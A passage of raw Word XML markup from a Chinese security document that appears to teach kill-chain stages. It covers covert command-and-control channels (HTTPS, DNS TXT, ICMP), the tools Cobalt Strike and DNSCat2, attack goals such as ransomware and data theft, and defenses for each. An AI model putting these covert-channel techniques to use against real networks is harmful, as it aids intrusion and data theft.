          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件完整性监控（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tripwire</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3E7EDC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为检测（异常进程监控）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14959F42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 xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Command &amp; Control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B5894" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Hlk200638735"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信技术</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D52090D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>通信技术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598"/>
        <w:gridCol w:w="3667"/>
        <w:gridCol w:w="2579"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0A2759BD" w14:textId="77777777" w:rsidTr="00501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F31DEB0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协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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738CACC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伪装方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="145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8C8CB2D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检测难点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1DE36795" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="22AA59B7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rFonts w:cs="Times New Roman"/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cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HTTP/HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2073" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7C4081D7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加密流量混入正常访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1459" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="51C2166E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需要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SSL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解密</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="6BA14D79" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="38098F01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rFonts w:cs="Times New Roman"/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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2073" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61BFE4F7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TXT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记录传递指令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1459" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19BFBC23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高频查询检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7A563EC1" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26261518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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2073" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E03F032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数据包载荷隐藏信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1459" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="182263AA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协议白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59B275B0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E59B948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工具：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325B88D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cobalt Strike</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：企业级远控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1925D84F" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNSCat2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8156E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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718B08C8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络流量分析（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zeek/Suricata</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDCC91A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出口流量过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BF2BE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 xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>行动</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Actions on Objectives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C2616" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Hlk200638905"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终目标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478DE346" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>最终目标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25"/>
        <w:gridCol w:w="5819"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3E1F29F3" w14:textId="77777777" w:rsidTr="00501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954C0A2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攻击类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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36ED647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典型案例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="278C05EA" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C99260B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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>数据窃取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3290" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A555AE0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窃取客户数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="395C569D" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41CBA0DF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rFonts w:cs="Times New Roman"/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勒索加密</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3290" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BE77410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WannaCry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全球爆发</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5B9C2294" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2673A5D8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系统破坏</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3290" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3DAE1D05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沙特阿美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Shamoon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攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0878D8AF" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0FE778D6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资源劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3290" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3E1360E4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门罗币挖矿僵尸网络</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F1D5A7D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442527A1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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E2A7F" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据分类分级保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D613043" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>离线备份策略（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-2-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原则）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14856A49" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Hlk200639459"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击手段与工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>矩阵</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B3461" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
